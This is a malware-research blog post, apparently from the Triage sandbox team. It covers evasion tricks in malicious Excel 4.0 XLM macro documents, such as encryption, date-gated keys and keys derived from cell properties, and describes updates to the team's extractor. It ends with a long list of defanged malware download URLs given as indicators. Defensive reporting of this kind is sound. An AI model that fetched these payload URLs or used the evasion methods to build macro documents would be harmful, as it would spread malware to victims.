More Excel 4.0 XLM Extraction

2020-04-15

Written by
Team

Introduction

This week we’re back with more information on XLM (Excel 4.0) Macros, and our progress on extracting these automatically during Triage analysis. If you haven’t already read our first blogpost on this subject, you can check that out here.

As usual once we started digging into the subject we rather fell down the rabbit hole, finding a whole host of ways in which XLM macros are being leveraged maliciously. In last week’s post we covered what could be considered the more straightforward types of XLM macros and demonstrated Triage’s new extractor. Today we have released an update for this, adding support for a range of additional XLM macro-enabled Office documents.

Overall, quite a lot has been happening in the space of XLM-enabled macro documents. Read on below for examples of these files and links to relevant Triage analyses!

Latest in XLM macros

Some samples have started using encrypted Office documents, a technique that has been discussed for several years already. Primarily, these encrypted documents make static analysis tools like Yara rules harder, but after decryption it’s the same old game.

http://www.pwncode.io/2020/04/xlm-hidden-macrosheets-used-for-evasion.html

Here is an example analysis from one of the files discussed in the blogpost:

https://tria.ge/reports/200410-tmzpvazbjn/static1

Some XLM documents have started activating on specific days or, more accurately, deactivating after the intended distribution date.

For these cases we’ve implemented a rather basic “day recovery” mechanism that automatically resolves the correct day, and thus encryption key, and extracts the formulas from there. For example -

https://tria.ge/reports/200415-ge3z646ttx/static1

Another feature that’s not “ideal” about this document is the fact that it dynamically crafts the formula to be executed, but then this formula includes a reference to the URL (for URLDownloadToFileA) in R1C1 notation. In other words, the XLM parser and interpreter need to be highly aware of its surrounding cells.

Continuing forward on that topic, more recent samples have started adding the document and cell properties (such as “amount of rows”, “amount of columns”, “font size”, etc) as input variables for the encryption key. See also the following tweet with accompanying analysis.

Our analysis on tria.ge:

https://tria.ge/reports/200415-y6k7zj694a/static1

Future Work

We’re currently looking into a couple of other, new XLM Macro capabilities employed since today and yesterday. E.g., embedding XLM macros in Office 2007+ documents.

Some IoCs

Following are a bunch of new IoCs based on public submissions to https://tria.ge/ as well as our own, continuous research.

    358 hxxps://rwtkoaqe[.]club/adfbr53g
    355 hxxp://fcowhcwsb[.]space/erg4ewr1
    326 hxxps://grpxmqnrb[.]pw/ehrj4g9g
    285 hxxps://grpxmqnrb[.]pw/egrg4g3g
    265 hxxps://waitupdate[.]xyz/deg34g
    215 hxxp://kacper-formela[.]pl/wp-smart.php
    215 hxxp://braeswoodfarmersmarket[.]com/wp-smart.php
    183 hxxps://pxdgcvnsb[.]xyz/aaeg4df12
    154 hxxps://ddfspwxrb[.]club/fb2g424g
    150 hxxps://gfhudnjv[.]xyz/vjd7f2js
    143 hxxps://veqejzkb[.]xyz/SDVe2f2fds
    141 hxxps://cworld[.]top/wp-front.php
    141 hxxps://assemble[.]sg/wp-front.php
    136 hxxps://merystol[.]xyz/6ng688x8
    136 hxxps://cdncloudtech[.]xyz/deg34g
    130 hxxps://emmnebuc[.]xyz/SDVJKBsdkhv1
    129 hxxps://cdncloudtech[.]xyz/bag4hy
    122 hxxps://doolised[.]xyz/DSBVhsdv78f
    120 hxxps://pnxkntdl[.]xyz/KJSDBViad7
    111 hxxp://wrjmkdod[.]xyz/KDHBVsd7v8
     99 hxxps://fbknuele[.]pw/ajt1eg4fh3a
     96 hxxps://paxtontranter[.]xyz/rv24t2
     95 hxxps://grundschule-manderbach[.]de/wp-content/themes/calliope/wp_data.php
     95 hxxps://free-lans[.]online/wp/wp-content/themes/calliope/wp_data.php
     92 hxxps://amberlessard[.]xyz/brg2sv
     91 hxxps://fbknuele[.]pw/aagaeg4df12
     89 hxxps://tdvomds[.]pw/12341324rfefv
     89 hxxps://gameaze[.]com/wp-content/themes/wp_data.php
     81 hxxps://efbzfyvsb[.]website/f2f23
     73 hxxps://merystol[.]xyz/DVkjbsdv37
     69 hxxps://tozcftdl[.]xyz/SDVjkhb7831r
     66 hxxps://narensyndicate[.]com/wp-crun.php
     66 hxxps://greentec-automation[.]com/wp-crun.php
     65 hxxps://wrjmkdod[.]xyz/SDFwef2fvbbe
     65 hxxps://pnxkntdl[.]xyz/KDSBVksdhv778a
     62 hxxps://friendoffishing[.]com//wp-content/themes/calliope/template-parts/wp_data.php
     59 hxxps://giaytore[.]com/wp-content/themes/calliope/wp-front.php
     59 hxxps://amgdorie[.]online/avdv43g
     56 hxxps://hxzfvomd[.]buzz/asf2f1ff
     56 hxxp://caudebachthu[.]com/wp-content/themes/calliope/wp_data.php
     56 hxxp://caude368[.]com/wp-content/themes/calliope/wp_data.php
     55 hxxps://rosannahtacey[.]xyz/vg43
     53 hxxps://ethelenecrace[.]xyz/fbb3
     51 hxxps://emmnebuc[.]xyz/vbdh72F
     50 hxxps://pjtcdnrd[.]pw/ckjbvkf732
     50 hxxps://gdchub[.]com/wp-content/themes/chihua/wp-front.php
     49 hxxps://pxdgcvnsb[.]xyz/ajt1eg4fh
     49 hxxps://pjtcdnrd[.]pw/fsgbfgbfsg43
     48 hxxps://gfhudnjv[.]xyz/bh6dk3an
     48 hxxps://amgdorie[.]online/avdv42g
     47 hxxp://tubolso[.]cl/wp-content/uploads/2020/02/white/444444.png
     47 hxxp://murreeweather[.]com/wp-content/white/444444.png
     47 hxxp://freespacemarketing[.]com/wp-content/uploads/2020/02/white/444444.png
     47 hxxp://batilservice[.]xyz/wp-content/uploads/2020/02/white/444444.png
     45 hxxps://tdvomds[.]pw/fgwg24g24g
     42 hxxps://friendoffishing[.]com/wp-content/themes/calliope/template-parts/wp_data.php
     36 hxxps://uenoeakd[.]site/grwrg24g2g
     35 hxxps://narensyndicate[.]com/wp-cran.php
     35 hxxps://greentec-automation[.]com/wp-cran.php
     35 hxxps://emmnebuc[.]xyz/DSKVJBdsj2
     29 hxxp://209[.]141.54.161/crypt.dll
     26 hxxp://uniluisgpaez[.]edu.co/wp-content/uploads/2020/02/idle/444444.png
     26 hxxps://wgyafqtc[.]online/fgwg24g24g
     26 hxxp://samphaopet[.]com/wp-content/uploads/2020/02/idle/111111.png
     26 hxxp://icietdemain[.]fr/contents/2020/02/idle/222222.png
     26 hxxp://careers[.]sorint.it/idle/33333.png
     19 hxxp://clarityupstate[.]com/b.ocx
     15 hxxps://studyshine[.]in/wp-cryn.php
     15 hxxps://gameaze[.]com//wp-content/themes/wp_data.php
     15 hxxps://arturkauf[.]pl/wp-cryn.php
     14 hxxps://flickkon[.]com//wp-content/themes/calliope/wp-front.php
     14 hxxps://flashretrieval[.]com/wp-content/themes/calliope/wp-front.php
     14 hxxp://march262020[.]club/files/bot.dll
     14 hxxp://lorrainehomeconsulting[.]com/wp-content/uploads/2020/02/trusty/187213.png
     14 hxxp://g2creditsolutions[.]com/trusty/444444.png
     12 hxxps://tdvomds[.]pw/1451345341fff
     10 hxxps://gartnerkvartalet[.]no/wp-content/themes/calliope/wp-front.php
     10 hxxps://assemble[.]sg/wp-frunt.php
      9 hxxps://orruucsl[.]xyz/fdgareg34g
      9 hxxps://gdchub[.]com//wp-content/themes/chihua/wp-front.php
      7 hxxp://gengrasjeepram[.]com/sv.exe
      6 hxxp://march262020[.]com/files/april8.dll
      5 hxxps://wrjmkdod[.]xyz/vdjfvfs7871f
      5 hxxps://doolised[.]xyz/SDVJbsldkcvg1
      3 hxxps://doolised[.]xyz/test
      3 hxxp://209[.]141.54.161/files/crypt.dll
      2 hxxp://wmwifbajxxbcxmucxmlc[.]com/files/april14.dll
      2 hxxps://wgyafqtc[.]online/sgfbsb4
      1 hxxps://virtualworkplace[.]online
      1 hxxps://nonnewspaper[.]com/bot.dll
      1 hxxps://merystol[.]xyz/qY3DRY3N
      1 hxxp://rilaer[.]com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe
      1 hxxp://fikima[.]com/axel.exe
      1 hxxp://fibercemper[.]com/wild.exe
      1 hxxp://209[.]141.54.161/crypt18.dll

Conclusion

Every day we’re seeing more and newer XLM document variants being released and we’re making sure to properly handle and detonate all of those in Triage.

We’re doing our very best to be on top of all of these techniques and to show you the results in a high-level manner. After all, it is our goal with Hatching Triage to make automated malware analysis easy, simple, and affordable to use.

Office